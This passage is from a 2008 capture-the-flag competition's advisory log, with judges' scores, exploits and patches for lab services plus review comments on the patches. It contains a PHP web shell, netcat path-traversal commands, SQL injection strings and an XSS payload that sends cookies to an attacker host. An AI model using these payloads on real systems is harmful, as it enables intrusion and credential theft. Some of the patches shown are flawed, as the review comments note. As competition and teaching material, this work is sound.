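    address and simply matches no row."""
    return conn.execute(
        "SELECT id, email FROM community_member WHERE email = ? AND password = ?",
        (email, md5_hex(password))).fetchone()


def login_outcomes():
    """(legitimate login, injected login, wrong password) on the sample DB."""
    conn = setup_db()
    return (login_safe(conn, 'alice@example.test', 'secret'),
            login_safe(conn, PAYLOAD, 'secret'),
            login_safe(conn, 'alice@example.test', 'wrong'))


if __name__ == '__main__':
    print(build_query_vulnerable(PAYLOAD, 'x'))
    print(login_outcomes())
```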
 
********************* Advisory 69, in23canation on myspray
 
Scored: 1
Submitted: 20:46:54 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said: hmm. okay, but score for that would be 0.25 :-)
 
Advisory
Information Disclosure
DEBUG is enabled by default in Django
 
Exploit
navigate to
http://10.1.xx.3/myspray/bla.html
 
 
Patch
Open settings.py and change DEBUG = True to DEBUG = False
 
********************* Advisory 74, h4ck!nb3rg on myspray
 
Scored: 3
Submitted: 21:01:07 1.8.2008
Published: 21:31:07 1.8.2008
 
Judge tilo said: jepp
 
Advisory
The myspray app is similar to studivz. The service allowed upload of PHP files for authenticated users. That can be done under mygraffiti.html.
 
Exploit
upload a file like this:
<?php
passthru($_GET['cmd']);
?>
 
then issue commands: ;-) for example:
rop1.php?cmd=whoami
 
results in:
www-data
 
 
Patch
Disable upload of PHP files in upload.html, for example disable upload of certain file extensions and disable execution of files in the folder where files are uploaded.
 
********************* Advisory 75, Squareroots on myspray
 
Scored: 1
Submitted: 21:01:51 1.8.2008
Published: 21:31:51 1.8.2008
 
Judge tilo said: You are not the first one, but your patch was more detailed, so you will get one point anyhow.
 
Advisory
======================================================================
squareroots @ cipher4
 
- myspray arbitrary command execution -
 
======================================================================
Table of Contents
 
Affected Service ....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Exploit / PoC........................................................4
Solution.............................................................5
Time Table...........................................................6
 
======================================================================
1) Affected Service
 
MySpray as a HTTP Service on URL http://host/myspray/
 
======================================================================
2) Severity
 
Rating: Highly critical
Impact: System compromise
Where : remote
 
======================================================================
3) Description of Vulnerability
 
It is possible to upload php-scripts via "My Graffiti" "upload".
 
======================================================================
4) Exploit / PoC
 
If you upload a php-script and then click on the link to the "big image",
the script is executed and you can execute arbitrary system / php commands.
 
======================================================================
5) Solution
 
Add a static filename to any upload to prevent the execution through the php-interpreter:
def upload(request):
    max = range(5)
    if isLoggedin(request):
        post = request.POST
        files = request.FILES
        if post and files:
            for i in max:
                try:
                    filename = files[str(i)]['filename'] + '.jpg'  # here we add a jpg to the filename!!!!
                    content = files[str(i)]['content']
                except:
 
======================================================================
 
 
Exploit
If you upload a php-script and then click on the link to the "big image",
the script is executed and you can execute arbitrary system / php commands.
 
Patch
Add a static filename to any upload to prevent the execution through the php-interpreter:
def upload(request):
    max = range(5)
    if isLoggedin(request):
        post = request.POST
        files = request.FILES
        if post and files:
            for i in max:
                try:
                    filename = files[str(i)]['filename'] + '.jpg'  # here we add a jpg to the filename!!!!
                    content = files[str(i)]['content']
                except:
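As an added example (not myspray's code and not the patch from advisories 74 or 75), a stricter version of the "rename the upload" idea those two advisories propose: the client-supplied name is discarded entirely, the extension is derived from the file's magic bytes, and the file is created with O_EXCL so nothing existing is overwritten. The allowlist, size limit and function names are assumptions made for this example.

```python
import os
import secrets
from typing import Optional

# Extension is chosen from the content, never from the client-supplied name.
# Constructed allowlist for this example; extend it as the application needs.
IMAGE_MAGIC = {
    b"\xff\xd8\xff": ".jpg",          # JPEG/JFIF
    b"\x89PNG\r\n\x1a\n": ".png",     # PNG
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}
MAX_UPLOAD = 100 * 1024               # assumed size limit for this example


def image_extension(content: bytes) -> Optional[str]:
    """Return the extension implied by the leading bytes, or None if the
    content does not start like any permitted image format."""
    for magic, ext in IMAGE_MAGIC.items():
        if content.startswith(magic):
            return ext
    return None


def safe_upload_name(content: bytes) -> Optional[str]:
    """Random, server-chosen file name with a content-derived extension.
    A PHP script (or anything else that is not an image) yields None."""
    if not content or len(content) > MAX_UPLOAD:
        return None
    ext = image_extension(content)
    if ext is None:
        return None
    return secrets.token_hex(16) + ext


def store_upload(upload_dir: str, content: bytes) -> str:
    """Write the upload under a fresh name and return that name.
    O_EXCL guarantees an existing file is never clobbered; the directory
    must still be served without script execution (advisory 74)."""
    name = safe_upload_name(content)
    if name is None:
        raise ValueError("upload rejected: not a permitted image")
    path = os.path.join(upload_dir, name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as fh:
        fh.write(content)
    return name
```

A genuine JPEG with PHP appended still passes the magic check, which is why the upload directory must additionally be configured not to execute scripts.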
 
 
********************* Advisory 76, ENOFLAG on rapid graffiti
 
Scored: 3
Submitted: 21:02:20 1.8.2008
Published: 21:32:20 1.8.2008
 
Judge tilo said: right
 
Advisory
when a user connects the authentication and logging is based on the cookie values.
 
when a cookie names userid exists and a cookie named ip with the remote-ip of the user exists, the user is logged in automagically
 
Exploit
use your favorite browser-plugin or wget to set the cookies
 
Patch
work around: use php-sessions to store the data. autologin will not be possible but single sign on.
 
e.g.:
 
diff -Naur rapid.prefls/ssl/sign.php rapid/ssl/sign.php
--- rapid.prefls/ssl/sign.php 2008-07-08 23:46:16.000000000 -1000
+++ rapid/ssl/sign.php 2008-08-01 08:55:04.000000000 -1000
@@ -39,7 +39,7 @@
<?php
if (isset($_REQUEST['un']) && isset($_REQUEST['pw']) && isset($_REQUEST['pw2']) && isset($_REQUEST['q']) && isset($_REQUEST['a']) && $_REQUEST['pw']==$_REQUEST['pw2'] && strlen($_REQUEST['pw'])>5 && strlen($_REQUEST['un'])>5) {
mysql_query("INSERT INTO pw (usr,pw,question,answer) VALUES ('".$_REQUEST['un']."','".md5($_REQUEST['pw'])."','".$_REQUEST['q']."','".$_REQUEST['a']."')");
exec("htpasswd -mb /home/rapid-users ".addslashes($_REQUEST['un'])." ".addslashes($_REQUEST['pw']));
echo "Hello ".$_REQUEST['un']."!<br>Your account has successfully been created.";
echo " <br><br><br>".
" <a href='login.php'>Login</a>";
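Review bot: the `@@ -39,7 +39,7 @@` hunk carries no `+` or `-` lines, so as pasted it shows nothing changed in sign.php; the edit the upload.php hunk below depends on (populating `$_SESSION['ip']` and `$_SESSION['user']` after `session_start()`) needs to be restored. Independently, the lines shown still build the INSERT from raw `$_REQUEST` values and hand `addslashes()` output to `exec()`; `addslashes` does not neutralise shell metacharacters, so use `escapeshellarg()` for both htpasswd arguments and escape the values going into the query.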
diff -Naur rapid.prefls/ssl/upload.php rapid/ssl/upload.php
--- rapid.prefls/ssl/upload.php 2008-07-08 23:46:16.000000000 -1000
+++ rapid/ssl/upload.php 2008-08-01 08:54:13.000000000 -1000
@@ -1,5 +1,7 @@
<?php
- if ($_COOKIE['ip']!=$_SERVER['REMOTE_ADDR']) {
+session_start();
+
+ if ($_SESSION['ip']!=$_SERVER['REMOTE_ADDR']) {
header("Location: http://".$_SERVER['SERVER_NAME']."/rapid/error.html");
die();
}
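Review bot: `$_SESSION['ip']` is read here, but nothing in this patch sets it (nor `$_SESSION['user']` used further down), so every visitor is redirected until the login side is updated too. Guard it explicitly with `isset($_SESSION['ip'])` so a missing session fails closed on purpose rather than through an undefined-index notice.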
@@ -62,11 +64,16 @@
$filename=$_FILES['f']['name'];
$filesize=$_FILES['f']['size'];
$filetmp =$_FILES['f']['tmp_name'];
+if (preg_match('/.php$/i', $filename)){
+ echo "PHP is not allowed for uploading<br>";
+ exit;
+}
+
$servername=$_SERVER['SERVER_NAME'];
if ($filetmp && $filesize>0 && $filesize<=102400 && !file_exists($filepath) && $conn) {
mkdir($filepath);
mysql_query("INSERT INTO dir (id,dir) VALUES (".$id.",'".$filepath2."')");
- mysql_query("INSERT INTO id (usr,id) VALUES ('".$_COOKIE['user']."',".$id.")");
+ mysql_query("INSERT INTO id (usr,id) VALUES ('".$_SESSION['user']."',".$id.")");
$handle=fopen($filepath.".htaccess","w");
fwrite($handle,"Options +Indexes");
fclose($handle);
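Review bot: the blocklist `preg_match('/.php$/i', $filename)` has an unescaped dot (it matches `xphp` as well) and only catches names that end in exactly `php`; `.phtml`, `.php5` or a double extension such as `shell.php.jpg` still pass and, depending on the AddHandler configuration, may still be executed. Prefer an allowlist of image extensions, discard the client-supplied name altogether, and keep script execution disabled for the upload directory as advisory 74's patch already suggests. The INSERT below the check still concatenates `$_SESSION['user']` unescaped.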
 
 
 
 
********************* Advisory 77, Defender of the Flag on ghoSTFTP
 
Scored: 3
Submitted: 21:03:38 1.8.2008
Published: 21:33:38 1.8.2008
 
Judge tilo said: finally. nice exploit. but there is an easier patch. read the rfc :-)
 
Advisory
In this service you can connect to the daemon. You can read the directory listing stored in the file .ls.
Afterwards you can read the files by requesting the filenames stored in .ls and get the flags as their content.
 
Exploit
get directory listing:
(perl -e 'print "\x01.ls\x00"';) | nc -u VULNERABLE 1025
(perl -e 'print "\x01FILENAME\x00"';) | nc -u VULNERABLE 1025
 
 
Patch
rename .ls in something hard to guess
 
********************* Advisory 78, ENOFLAG on rapid graffiti
 
Scored: 1
Submitted: 21:04:30 1.8.2008
Published: 21:34:30 1.8.2008
 
Judge tilo said: ok, good patch, but very easy to detect.
 
Advisory
the login screen shows all available usernames within a selectbox.
this provides a malicious user with information to brute-force accounts
 
Exploit
 
 
Patch
- echo "<tr><td>Login:</td><td><select name='login' size='4' style='width:172px;display:block'>";
- $result=mysql_query("SELECT usr FROM pw WHERE usr!='anonymous'");
- while($row = mysql_fetch_object($result)) {
- echo "<option value='".$row->usr."'>".$row->usr."</option>";
- }
- echo "</select></td></tr>";
+ echo "<tr><td>Login:</td><td>" ;
+ echo "<input name='login' style='width:172px;display:block' />";
+
+
+// echo"<select name='login' size='4' style='width:172px;display:block'>";
+// $result=mysql_query("SELECT usr FROM pw WHERE usr!='anonymous'");
+// while($row = mysql_fetch_object($result)) {
+// echo "<option value='".$row->usr."'>".$row->usr."</option>";
+// }
+// echo "</select>"
+
+ echo"</td></tr>";
+
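Review bot: the replacement leaves the old `<select>` block commented out instead of deleting it; dead code containing a live `mysql_query` tends to get uncommented later. Give the new `<input name='login'>` a `maxlength`, and note that the username is now free text, so the login handler must escape it before it reaches the `SELECT pw FROM pw WHERE usr=` query (advisory 120 shows that query unescaped).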
 
********************* Advisory 81, Wizards of DoS on brook3
 
Scored: 5
Submitted: 21:12:54 1.8.2008
Published: 21:42:54 1.8.2008
 
Judge tilo said: the first brook3 advisory. correct. very nice!
 
Advisory
The sequence number check for the movement command verifies only whether the game's client OR the sequence number is correct. This might enable an attacker to inject moves into an arbitrary game.
 
Exploit
That way it is simple to inject false moves into any running game by just "guessing" the ip of the gamemaster.
 
Thus
echo "10.1.xx.3 10.0.100.12 k MOV n" | netcat 10.1.yy.3 3333
with xx,yy providing regular subnet numbers, k being an arbitrary number, n being a field number injects a move into the game played at 10.1.yy.3 between yy and xx.
 
This might confuse any of the brook3 players.
 
Patch
The first patch is quite simple:
 
substitute
if ( not (isFullCol (board game) (atoi dat))
&& (src == (client game) || (atoi seq == seqno game + 1)))
 
in the function bMOV
 
with
if ( not (isFullCol (board game) (atoi dat))
&& (src == (client game) || (atoi seq == (seqno game) + 1)))
 
********************* Advisory 83, Defender of the Flag on rapid graffiti
 
Scored: 2
Submitted: 21:16:09 1.8.2008
Published: 21:46:09 1.8.2008
 
Judge tilo said: well, i think point 2 is new.
 
Advisory
In the Rapid service you have to check the input data in several fields.
 
Exploit
1.
→ the $_REQUEST('d') in the upload.php has to be checked, otherwise someone can create directories on the server (you have to remove all slashes with str_replace)
 
 
2.
→ the user-data from the cookie was directly put in the database without any check
 
 
Patch
1.
 
=> $dirname = str_replace("/", "", mysql_real_escape_string($_REQUEST['d']));
=> $id = str_replace("/", "", $id);
 
2.
=> mysql_real_escape_string($_COOKIE['user'])
 
 
********************* Advisory 85, n0 sp00n on tagging
 
Scored: 3
Submitted: 21:32:08 1.8.2008
Published: 22:02:08 1.8.2008
 
Judge Lexi said: ok, and even nicely written
 
Advisory
Background:
Tagging allows users to upload and retrieve photo images
 
store.pm does not check the filename, so it is possible to write to arbitrary files owned by tagging - same for retrieve.pm (reading arbitrary files)
 
Exploit
nc -u 10.1.x.3 5354
retrieve <filename>
 
# assume user and pass are enrolled
nc -u 10.1.x.3 5354
owner user
password pass
store <filename>
content
EOF
 
Patch
diff --git a/annotate.pm b/annotate.pm
index 7f8a531..d6b92fb 100644
--- a/annotate.pm
+++ b/annotate.pm
@@ -5,6 +5,7 @@ use mickeysoft_sequel;
sub init {
my ($self,$filename) = @_;
$self={};
+ $filename =~ s/[^\\da-zA-Z\\.]//g;
print "annotate::init to $filename\
";
$self->{'filename'} = $filename;
$self->{'tags'} = [];
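Review bot: `s/[^\da-zA-Z\.]//g` silently rewrites a bad name instead of rejecting it: `../../secret` becomes `....secret`, a valid name the caller never asked for, and because `.` stays permitted, dot files and the service's own `*.pm` modules remain addressable (advisory 121 later relies on exactly that). Match the name against an allowlist and return an error on mismatch, and do it before `$self={}` as the other modules in this patch do, so all six files behave the same.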
diff --git a/enroll.pm b/enroll.pm
index af8d1ed..57ae780 100644
--- a/enroll.pm
+++ b/enroll.pm
@@ -4,6 +4,7 @@ use mickeysoft_sequel;
 
sub init {
my ($self,$username) = @_;
+ $username =~ s/[^\\da-zA-Z\\.]//g;
$self={};
print "enroll::init for $username\
";
$self->{'username'} = $username;
diff --git a/register.pm b/register.pm
index b04bb68..7cb9586 100644
--- a/register.pm
+++ b/register.pm
@@ -4,6 +4,7 @@ use mickeysoft_sequel;
 
sub init {
my ($self,$filename) = @_;
+ $filename =~ s/[^\\da-zA-Z\\.]//g;
$self={};
print "register::init to $filename\
";
$self->{'filename'} = $filename;
diff --git a/remarks.pm b/remarks.pm
index 878cb90..eb19198 100644
--- a/remarks.pm
+++ b/remarks.pm
@@ -4,7 +4,8 @@ use mickeysoft_sequel;
 
sub init {
my ($self,$filename) = @_;
- $self={};
+$filename =~ s/[^\\da-zA-Z\\.]//g;
+$self={};
print "remarks::init to $filename\
";
$self->{'filename'} = $filename;
$self->{'db'} = mickeysoft_sequel::init();
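Review bot: the two `+` lines are not indented to the level of the surrounding `sub init` body (compare the same insertion in enroll.pm and register.pm); cosmetic, but it makes the diff noisier than it needs to be.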
diff --git a/retrieve.pm b/retrieve.pm
index 0a06bd0..5911243 100644
--- a/retrieve.pm
+++ b/retrieve.pm
@@ -2,10 +2,11 @@ package retrieve;
 
sub init {
my ($self,$filename) = @_;
+ $filename =~ s/[^\\da-zA-Z\\.]//g;
$self={};
print "retrieve::init to $filename\
";
$self->{'buffer'} = '';
- if (open(FILE,"< $filename")) {
+ if (open(FILE, "<", $filename")) {
while(<FILE>) { $self->{'buffer'} .= $_; }
close(FILE);
} else {
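Review bot: `open(FILE, "<", $filename")` has a stray `"` after `$filename`, which leaves the string literal unterminated; retrieve.pm will not compile with this hunk applied. It should read `open(FILE, "<", $filename)`. Moving to the three-argument form is the right fix, since the two-argument `open(FILE,"< $filename")` let a name containing `|` or `>` change the open mode.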
diff --git a/store.pm b/store.pm
index e3cb433..eee44c0 100644
--- a/store.pm
+++ b/store.pm
@@ -6,6 +6,7 @@ sub load {
 
sub init {
my ($self,$filename) = @_;
+ $filename =~ s/[^\\da-zA-Z\\.]//g;
$self={};
print "store::init to $filename\
";
$self->{'filename'} = $filename;
@@ -22,7 +23,7 @@ sub input {
}
print "store::input is appending to ".$self->{'filename'}."\
";
$self->{'failures'} = 0;
- if(open(FILE,">> ".$self->{'filename'})) {
+ if(open(FILE,">>",$self->{'filename'})) {
binmode(FILE);
print FILE $line;
close(FILE);
diff --git a/tagger.pl b/tagger.pl
index d06d4fb..31fe07c 100755
--- a/tagger.pl
+++ b/tagger.pl
@@ -4,6 +4,7 @@ use blackmagic;
use Socket;
use IO::Socket::INET;
use IO::Select;
+use Sys::Syslog;
$port = 5354;
 
$quit=0;
@@ -22,13 +23,14 @@ while(!$quit){
my %input4;
undef %input4;
$input4{$_} = 0 foreach(keys %sessions);
- # c3RyYW5nZWx5IGRvZXNudCBzZWVtIHRvIGZpcmUgb2Z0ZW4gZW5vdWdo
+ # strangely doesnt seem to fire often enough
if(@f=$select->can_read(0.5)) {
foreach$socket(@f){
$sin = $socket->recv($msg,0xffff);
+ syslog("info", "tagging received: $msg");
($p,$i) = sockaddr_in($sin);
$str=inet_ntoa($i).":$p";
- # c3RhcnQgbmV3IHNlc3Npb24=
+ # start new session
unless(defined $sessions{$sin}) {
@a=split(/ /,$msg);
$foo=shift(@a);
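Review bot: `syslog("info", "tagging received: $msg")` passes client-controlled bytes as Sys::Syslog's format argument, which is printf-style, so a datagram containing `%` sequences is interpreted rather than logged; use `syslog("info", "%s", "tagging received: $msg")`. Also, the protocol carries `password <pass>` lines in the clear (see the Exploit above), so logging every datagram verbatim writes user passwords into syslog; log only the command word, or redact that line.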
@@ -40,12 +42,13 @@ while(!$quit){
} else {
$sessions{$sin} = $bar;
}
- # bmV3IGlucHV0IGZvciBleGlzdGluZyBzZXNzaW9ucw==
+ # new input for existing sessions
} else {
$input4{$sin} += 1;
$bar = $sessions{$sin};
if($rmsg = $bar->input($msg)) {
$serv->send($rmsg,0,$sin);
+ syslog("info", "tagging sent: $rmsg");
} else {
$serv->send('',0,$sin);
print "$str aXMgY2xvc2Vk\
";
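Review bot: same format-string problem for `syslog("info", "tagging sent: $rmsg")`; pass `"%s"` as the format and the message as the argument.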
@@ -55,13 +58,14 @@ while(!$quit){
}
}
}
- # bWFpbnRhaW5nIGluYWN0aXZlIHNlc3Npb25z
+ # maintaing inactive sessions
foreach $sin (grep {!$input4{$_}} keys %input4) {
($p,$i) = sockaddr_in($sin);
$str=inet_ntoa($i).":$p";
$foo = $sessions{$sin};
if( $msg = $foo->idle() ) {
$serv->send($msg,0,$sin);
+ syslog("info", $msg);
} else {
print "$str aXMgY2xvc2Vk\
";
$foo->done();
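Review bot: `syslog("info", $msg)` makes the message itself the format string; use `syslog("info", "%s", $msg)` here as well.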
 
 
********************* Advisory 88, h4ck!nb3rg on myspray
 
Scored: 2
Submitted: 21:48:40 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said: this is not the first xss advisory. well i'm not sure if it is the first one for writemessage.
 
Advisory
myspray is an application similar to studivz. it enables receiving messages and also answering them. the answer section is prone to cross site scripting attacks. if an admin reads the message, the cookie can be stolen and with administrative privileges the attacker can take over control of the app.
 
Exploit
to write a message to a certain user, you can for example use the following url:
/myspray/writemessage2238.html
simply enter script tags to "subject" or "test".
for example:
<script>alert(document.cookie)</script>
instead of alerting the cookie, it could be sent to an attacker using an image tag.
 
Patch
simply patch "writemessage.html" to use htmlentities for the parameter mentioned above.
 
********************* Advisory 89, Flux Fingers on (General Fault)
 
Scored: 2
Submitted: 21:49:24 1.8.2008
Published: 22:19:24 1.8.2008
 
Judge Lexi said: nicely found :)
 
Advisory
This is more of a logic error.
 
The method to randomize VPN subnets to mask the team and the team-ID via the randomization can be circumvented using the script.
 
http://10.0.0.10:8000/debugging_info.php
 
Exploit
http://10.0.0.10:8000/debugging_info.php?term=team&id=3
 
-> shows which flag was received from which IP
 
Patch
Keep the assignment Team-ID <---> SUBNET as in previous CIPHERs.
 
********************* Advisory 90, The RPIsec knurd machine on rapid graffiti
 
Scored: 3
Submitted: 21:52:42 1.8.2008
Published: 22:22:42 1.8.2008
 
Judge tilo said: Coool. One of the vulnerabilities I did not know about :-D
 
Advisory
JavaScript in an uploaded image file name will be executed by radmin.php
 
Exploit
Upload an image called <img src="aoeuaeouht.jpg" onerror="javascript:alert(document.cookie)">
If an admin logs into radmin.php, his cookies will pop up in an alert. You can use this technique to steal his cookies by redirecting him to a web server under your control.
 
Patch
HTML encode < and >. $filename = htmlentities($filename);
 
********************* Advisory 92, in23canation on rapid graffiti
 
Scored: 1
Submitted: 22:04:48 1.8.2008
Published: 22:34:48 1.8.2008
 
Judge tilo said: yet another sql injection... :-) missing exploit.
 
Advisory
vulnerable for SQL injection:
 
upload.php for example:
 
mysql_query("INSERT INTO dir (id,dir) VALUES (".$id.",'".$filepath."')");
 
 
Exploit
 
 
Patch
$id = mysql_escape_string($id);
$filepath = mysql_escape_string($filepath);
 
mysql_query("INSERT INTO dir (id,dir) VALUES (".$id.",'".$filepath."')");
mysql_query("INSERT INTO id (usr,id) VALUES ('anonymous',".$id.")");
 
 
********************* Advisory 93, n0 sp00n on tagging
 
Scored: 3
Submitted: 22:05:21 1.8.2008
Published: 22:35:21 1.8.2008
 
Judge Lexi said: much better
 
Advisory
query_remarks in the Tagging service allows a SQL injection that reveals the full remarks database.
 
 
Exploit
echo "query_remarks aaaaa' or length(text)=3
2 or 'a'='" | nc -u 10.1.x.3 5354
 
 
Patch
--- a/query_remarks.pm
+++ b/query_remarks.pm
@@ -10,6 +10,10 @@ sub init {
print "query_remarks::init to @_\
";
$self->{'buffer'} = [];
$db = mickeysoft_sequel::init();
+ my $tag = "@_";
+ if ($tag !~ /^[\\d+]$/) {
+ return;
+ }
$data = $db->work("SELECT text FROM remark WHERE tag='@_'");
if($data) {
foreach $row (@$data) {
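Review bot: `$tag !~ /^[\d+]$/` is a character class, so it accepts exactly one character that is a digit or a literal `+` and rejects every multi-digit tag; the intended pattern is `/^\d+$/`. A bare `return;` from `init` also hands the caller an undefined object; return an error response instead so the client still gets a reply.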
 
********************* Advisory 94, The Electronic Mayhem on ghoSTFTP
 
Scored: 5
Submitted: 22:06:23 1.8.2008
Published: 22:36:23 1.8.2008
 
Judge tilo said: first real ghosti exploit and a very nice patch!!
 
Advisory
The ghoSTFTP service is a minimalist file transfer service. Due to a lack of input validation, this service allows an unauthenticated remote attacker to read any file that the service daemon is allowed to read.
 
Exploit
Simply send "\x01/../..$MYPATH\x00" as a UDP packet to port 1025, where $MYPATH is any absolute file path.
 
Patch
Perform input validation:
 
/checkFilename {
    /filename exch def
    /n filename length def
    0 1 n 1 sub {
        /i exch def
        /c filename i get def
        65 c le c 90 le and
        97 c le c 122 le and or
        48 c le c 57 le and or
        not { quit } if
    } for
} bind def

% Main
/main {
    /len readstr def
    /len len cvi def
    /opcode readopc def
    opcode (\1) eq {
        /filename readstr def
        filename checkFilename
        filename send
        quit
    } if
    opcode (\3) eq {
        /filename readstr def
        /len len filename length sub def
        /len len 2 sub def
        filename checkFilename
        filename len receive
        filename ps
        filename ack
        quit
    } if
    %opcode (\6) eq {
    %    (.ls) send
    %    quit
    %} if
    (error) err
    quit
} bind def
main
 
 
********************* Advisory 95, n0 sp00n on ghoSTFTP
 
Scored: 2
Submitted: 22:06:44 1.8.2008
Published: 22:36:44 1.8.2008
 
Judge tilo said: Finally somebody has read the RFC.
 
Advisory
See advisory 77. One can retrieve .ls by opcode 6 as well.
 
The opcode 6 is not in the RFC, so directory listing is not part of the standard!
 
 
Exploit
(perl -e 'print "\x06"';) | nc -u VULNERABLE 1025
 
Patch
remove opcode 6 code
replace (.ls) send
by % (.ls) send
remove .ls file
 
********************* Advisory 97, n0 sp00n on ghoSTFTP
 
Scored: 1
Submitted: 22:10:05 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said: hmmm, not quite correct. Think a little bit more about this.
 
Advisory
when ack is called (in opcode 3, writing files), .pi.ps is executed (as postscript code)
 
Exploit
overwrite .pi.ps using opcode 3, it is then executed on the next file write.
 
Patch
comment the (.pi.ps) run line
-> % (.pi.ps) run
 
********************* Advisory 98, h4ck!nb3rg on gabble
 
Scored: 3
Submitted: 22:10:32 1.8.2008
Published: 22:40:32 1.8.2008
 
Judge tilo said: Okay, just sql injections without exploit. But nice patch.
 
Advisory
all database queries in Database.c are not filtered for characters like "#,',..." which can be used in SQL statements;
 
 
Exploit
 
 
Patch
add a function to check inputs like this:
 
#include <stddef.h>
#include <string.h>

/*
 * check inputs for disallowed values
 * returns 0 if none of ' # ` occur in the string, -1 otherwise
 */
int checkSQLString(const char *string) {
    const char *ret;

    if (string == NULL)
        return -1;
    ret = strchr(string, '\'');
    if (ret == NULL) {
        ret = strchr(string, '#');
        if (ret == NULL)
            ret = strchr(string, '`');
        if (ret == NULL)
            return 0;
    }
    return -1;
}
 
 
// and check the inputs e.g.
 
if(checkSQLString(user)!=0)
return -1;
if(checkSQLString(password)!=0)
return -1;
 
 
 
 
 
 
 
********************* Advisory 99, Flux Fingers on myspray
 
Scored: 3
Submitted: 22:13:34 1.8.2008
Published: 22:43:34 1.8.2008
 
Judge tilo said: The last XSS advisory that I accept. All vulnerable fields have been mentioned here and the exploit and patch are nice.
 
Advisory
MySpray is a clone of a well-known German social network. Everyone has their own profile page, including information about them.
By entering malicious data, an adversary would be able to take over someone's session and/or execute JavaScript within the context of the MySpray web application. (E.g.: steal the cookie of a victim visiting the profile, change the victim's profile (this could lead to a myspray worm (hi@samy). sweet!))
 
 
Exploit
Affected Form-Fields: First Name, Last Name, City, Jabber, Website, Job, Interests, and About me.
 
Example:
1) Change one of the affected fields to <script>document.location.href="http://myIP/catcher.php?cookie="+document.cookie</script>
2) Wait :)
 
3) tail -f <file_to_where_catcher.php logs>
 
 
 
 
Patch
Change "views.py" file. Use function htmlspecialchars().
 
 
********************* Advisory 100, ENOFLAG on rapid graffiti
 
Scored: 1
Submitted: 22:16:28 1.8.2008
Published: 22:46:28 1.8.2008
 
Judge tilo said: k
 
Advisory
some lame sql injection in sign.php
 
Exploit
 
 
Patch
always use sprintf for more clarity and add slashes....
 
$sql=sprintf("INSERT INTO pw (usr,pw,question,answer) VALUES ('%s','%s','%s','%s')",
addslashes($_REQUEST['un']) ,
addslashes($_REQUEST['pw']) ,
addslashes($_REQUEST['q']) ,
addslashes($_REQUEST['a'])
);
mysql_query($sql);
 
 
********************* Advisory 101, Amish Security on gabble
 
Scored: 2
Submitted: 22:16:41 1.8.2008
Published: 22:46:41 1.8.2008
 
Judge tilo said: First buffer overflow Advisory. But just a segFault...
 
Advisory
A sufficiently long username will exceed the query length (1024) and
cause a segmentation fault.
 
int dbUserExists(char* user) {
    MYSQL_RES *res;
    MYSQL_ROW row;
    int ret = 0;
    char query[QUERYLEN];

    sprintf(query,"SELECT name FROM users WHERE name='%s'",user);
    if (mysql_query(conn,query)) {
        fprintf(stderr,"%s\n",mysql_error(conn));
        return ret;
    }
    res = mysql_use_result(conn);
    row = mysql_fetch_row(res);
    if (row != NULL) ret = 1;
    mysql_free_result(res);

    return ret;
}
 
Exploit
./gabbler <server> -e `perl -e 'print "1|"."a"x1000;print "|a;"'`
 
Patch
Limit the username size to something realistic.
 
Before sprintf :
 
if(strlen(user) > 60) { return 0; }
 
 
********************* Advisory 103, The RPIsec knurd machine on rapid graffiti
 
Scored: 1
Submitted: 22:21:05 1.8.2008
Published: 22:51:05 1.8.2008
 
Judge tilo said: Okay, XSS in rapid. But note that you won't get a flag with this exploit! Try something similar in myspray. The gameserver visits some myspray profiles with the gecko engine!
 
Advisory
There is CSRF and XSS in the username field of the sign.php page.
 
Exploit
You can make a GET request to make a new user account with JavaScript in their name. If you can get an admin or somebody who is logged in to click the link, you can steal their cookies.
 
https://10.1.x.3/rapid/ssl/sign.php?un=<script>alert(document.cookie);</script>&pw=aoeuaoeu&pw2=aoeuaoeu&q=forty&a=forty
 
 
Patch
HTML encode the username to prevent the tag from being interpreted. $_REQUEST['un'] = htmlentities($_REQUEST['un']);
 
********************* Advisory 104, in23canation on rapid graffiti
 
Scored: 1
Submitted: 22:21:44 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said: ...
 
Advisory
Yet another sql injection:
 
mysql_query("INSERT INTO file (id,file) VALUES (".$id.",'".$filename."')");
 
 
Exploit
 
 
Patch
$id = mysql_escape_string($id);
$filename = mysql_escape_string($filename);
 
mysql_query("INSERT INTO file (id,file) VALUES (".$id.",'".$filename."')");
 
 
********************* Advisory 106, in23canation on rapid graffiti
 
Scored: 1
Submitted: 22:23:31 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said: ...
 
Advisory
SQL-injection:
 
$answer=mysql_query("SELECT dir.dir,file.file,id.usr
FROM dir JOIN file JOIN id
WHERE dir.id=file.id AND dir.id=id.id AND id.usr='".$login."'");
 
 
Exploit
 
 
Patch
$login = mysql_escape_string($login);
$answer=mysql_query("SELECT dir.dir,file.file,id.usr
FROM dir JOIN file JOIN id
WHERE dir.id=file.id AND dir.id=id.id AND id.usr='".$login."'");
 
 
********************* Advisory 107, HackerDom on rapid graffiti
 
Scored: 1
Submitted: 22:25:01 1.8.2008
Published: 22:55:01 1.8.2008
 
Judge tilo said: ...
 
Advisory
http://10.1.<team>.3/rapid/files/ is open for listing. It is possible to view all dirs and files (images with flags).
 
Exploit
For example: http://10.1.14.3/rapid/files/
 
Patch
in /etc/apache2/sites-enabled/rapid
set Options -Indexes for 80 & 443 ports
 
********************* Advisory 108, HackerDom on ghoSTFTP
 
Scored: 1
Submitted: 22:34:35 1.8.2008
Published: 23:04:35 1.8.2008
 
Judge Lexi said: not first, see 20:10, but at least exploit and patch given
 
Advisory
ghoSTFTP, after receiving a file and before sending the acknowledgement, runs the ps function:
 
filename len receive
filename ps
filename ack
 
which checks whether the uploaded filename ends with .ps. If it is a *.ps file, it is executed.
 
Exploit
Form an arbitrary PostScript program of less than 128 bytes and upload it.
 
Patch
remove
filename ps
and
% Execute a postscript file
/ps {
    /filename exch def
    /len filename length def
    len 3 lt {
        quit
    } if
    /c1 filename len 1 sub get def
    /c2 filename len 2 sub get def
    /c3 filename len 3 sub get def
    c1 115 eq c2 112 eq and c3 46 eq and {
        filename run
    } if
} bind def
 
 
********************* Advisory 109, SYPER on brook3
 
Scored: 1
Submitted: 22:44:51 1.8.2008
Published: 23:14:51 1.8.2008
 
